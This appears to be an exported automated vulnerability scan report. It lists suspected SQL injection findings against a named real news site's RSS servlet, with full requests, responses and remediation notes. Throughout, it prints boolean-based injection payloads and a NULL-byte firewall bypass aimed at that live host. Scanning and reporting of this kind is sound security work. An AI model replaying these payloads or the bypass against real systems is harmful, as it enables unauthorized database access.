<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss'%20and%201%3d1--%20/CustomRssServlet/568/200224.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:38 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss'%20and%201%3d2--%20/CustomRssServlet/568/200224.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200224.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:20:39 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200224.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:39 GMT Content-Length: 0 Connection: close
1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://feeds.mercurynews.com
Path:
/mngi/rss/CustomRssServlet/568/200729.xml
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18085221%20or%201%3d1--%20 and 18085221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d1--%20=1 HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/xml;charset=utf-8 Date: Tue, 07 Dec 2010 23:21:37 GMT Content-Length: 23879 Connection: close X-N: S
<?xml version="1.0" encoding="UTF-8"?> <rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"> <channel> <atom:link href="http://fee ...[SNIP]... <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1111/20101111__quakes~1.JPG" length="154740" type="image/pjpeg"/> </item> <item> <title><![CDATA[Quakes owner: New stadium in about two years]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid> <description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate> </item> <item> <title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid> <description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate> <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg" length="36852" type="image/pjpeg"/> </item> <item> <title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York]]></title ...[SNIP]...
Request 2
GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d2--%20=1 HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/xml;charset=utf-8 Date: Tue, 07 Dec 2010 23:21:41 GMT Content-Length: 23889 Connection: close X-N: S
<?xml version="1.0" encoding="UTF-8"?> <rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"> <channel> <atom:link href="http://fee ...[SNIP]... <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1104/20101104_091315_11.4.quakeslisting.jpg" length="0" type="image/jpeg"/> </item> <item> <title><![CDATA[Quakes owner: New stadium in about two years]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid> <description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate> </item> <item> <title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid> <description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate> <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg" length="36852" type="image/pjpeg"/> </item> <item> <title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200733.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:07 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200733.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:07 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 55498630%20or%201%3d1--%20 and 55498630%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d1--%20/200736.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:18:33 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d2--%20/200736.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:18:33 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200738.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:18:41 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200738.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:18:41 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200742.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:04 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200742.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:04 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15112565%20or%201%3d1--%20 and 15112565%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d1--%20/200742.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:09 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d2--%20/200742.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:09 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200743.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:19:01 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200743.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:02 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 62668673%20or%201%3d1--%20 and 62668673%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d1--%20/200744.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:07 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d2--%20/200744.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:07 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:18:56 GMT Connection: close
